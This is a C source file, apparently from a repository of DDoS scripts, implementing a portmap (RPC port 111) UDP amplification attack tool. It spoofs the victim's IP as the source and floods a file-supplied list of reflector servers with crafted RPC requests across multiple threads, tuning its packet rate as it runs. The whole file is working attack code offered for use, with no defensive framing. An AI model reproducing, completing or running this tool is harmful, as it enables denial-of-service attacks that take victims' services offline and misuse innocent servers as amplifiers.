Path: blob/master/DDOS Scripts/AMP Methods/PORTMAP Amplification/zudp_attack_script.c
4622 views
#include <time.h>1#include <pthread.h>2#include <unistd.h>3#include <stdio.h>4#include <stdlib.h>5#include <string.h>6#include <sys/socket.h>7#include <netinet/ip.h>8#include <netinet/udp.h>9#include <arpa/inet.h>10#define MAX_PACKET_SIZE 819211#define PHI 0x9e3779b912static uint32_t Q[4096], c = 362436;13struct list14{15struct sockaddr_in data;16struct list *next;17struct list *prev;18};19struct list *head;20volatile int limiter;21volatile unsigned int pps;22volatile unsigned int sleeptime = 100;23struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };24void init_rand(uint32_t x)25{26int i;27Q[0] = x;28Q[1] = x + PHI;29Q[2] = x + PHI + PHI;30for (i = 3; i < 4096; i++)31{32Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;33}34}35uint32_t rand_cmwc(void)36{37uint64_t t, a = 18782LL;38static uint32_t i = 4095;39uint32_t x, r = 0xfffffffe;40i = (i + 1) & 4095;41t = a * Q[i] + c;42c = (t >> 32);43x = t + c;44if (x < c) {45x++;46c++;47}48return (Q[i] = r - x);49}50unsigned short csum (unsigned short *buf, int nwords)51{52unsigned long sum = 0;53for (sum = 0; nwords > 0; nwords--)54sum += *buf++;55sum = (sum >> 16) + (sum & 0xffff);56sum += (sum >> 16);57return (unsigned short)(~sum);58}59void setup_ip_header(struct iphdr *iph)60{61iph->ihl = 5;62iph->version = 4;63iph->tos = 0;64iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 50;65iph->id = htonl(54321);66iph->frag_off = 0;67iph->ttl = MAXTTL;68iph->protocol = IPPROTO_UDP;69iph->check = 0;70iph->saddr = inet_addr("192.168.3.100");71}72void setup_udp_header(struct udphdr *udph)73{74udph->source = htons(5678);75udph->dest = htons(111);76udph->check = 0;77memcpy((void *)udph + sizeof(struct udphdr), "\x65\x72\x0a\x37\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 50);78udph->len=htons(sizeof(struct udphdr) + 50);79}80void *flood(void *par1)81{82struct thread_data *td = (struct thread_data *)par1;83char datagram[MAX_PACKET_SIZE];84struct iphdr *iph = (struct iphdr *)datagram;85struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);86struct sockaddr_in sin = td->sin;87struct list *list_node = td->list_node;88int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);89if(s < 0){90fprintf(stderr, "error. got r00t?\n");91exit(-1);92}93init_rand(time(NULL));94memset(datagram, 0, MAX_PACKET_SIZE);95setup_ip_header(iph);96setup_udp_header(udph);97udph->source = htons(rand() % 65535 - 1026);98iph->saddr = sin.sin_addr.s_addr;99iph->daddr = list_node->data.sin_addr.s_addr;100iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);101int tmp = 1;102const int *val = &tmp;103if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){104fprintf(stderr, "error. u dun goofed.\n");105exit(-1);106}107init_rand(time(NULL));108register unsigned int i;109i = 0;110while(1){111sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));112list_node = list_node->next;113iph->daddr = list_node->data.sin_addr.s_addr;114iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);115iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);116pps++;117if(i >= limiter)118{119i = 0;120usleep(sleeptime);121}122i++;123}124}125int main(int argc, char *argv[ ])126{127if(argc < 5){128fprintf(stderr, "Invalid parameters!\n");129fprintf(stdout, "Usage: %s [IP] [file] [threads] [limiter] [time]\n", argv[0]);130exit(-1);131}132srand(time(NULL));133int i = 0;134head = NULL;135fprintf(stdout, "Opening sockets...\n");136int max_len = 128;137char *buffer = (char *) malloc(max_len);138buffer = memset(buffer, 0x00, max_len);139int num_threads = atoi(argv[3]);140int maxpps = atoi(argv[4]);141limiter = 0;142pps = 0;143int multiplier = 20;144FILE *list_fd = fopen(argv[2], "r");145while (fgets(buffer, max_len, list_fd) != NULL) {146if ((buffer[strlen(buffer) - 1] == '\n') ||147(buffer[strlen(buffer) - 1] == '\r')) {148buffer[strlen(buffer) - 1] = 0x00;149if(head == NULL)150{151head = (struct list *)malloc(sizeof(struct list));152bzero(&head->data, sizeof(head->data));153head->data.sin_addr.s_addr=inet_addr(buffer);154head->next = head;155head->prev = head;156} else {157struct list *new_node = (struct list *)malloc(sizeof(struct list));158memset(new_node, 0x00, sizeof(struct list));159new_node->data.sin_addr.s_addr=inet_addr(buffer);160new_node->prev = head;161new_node->next = head->next;162head->next = new_node;163}164i++;165} else {166continue;167}168}169struct list *current = head->next;170pthread_t thread[num_threads];171struct sockaddr_in sin;172sin.sin_family = AF_INET;173sin.sin_addr.s_addr = inet_addr(argv[1]);174struct thread_data td[num_threads];175for(i = 0;i<num_threads;i++){176td[i].thread_id = i;177td[i].sin= sin;178td[i].list_node = current;179pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);180}181fprintf(stdout, "Sending attack..\n");182for(i = 0;i<(atoi(argv[5])*multiplier);i++)183{184usleep((1000/multiplier)*1000);185if((pps*multiplier) > maxpps)186{187if(1 > limiter)188{189sleeptime+=100;190} else {191limiter--;192}193} else {194limiter++;195if(sleeptime > 25)196{197sleeptime-=25;198} else {199sleeptime = 0;200}201}202pps = 0;203}204return 0;205}206207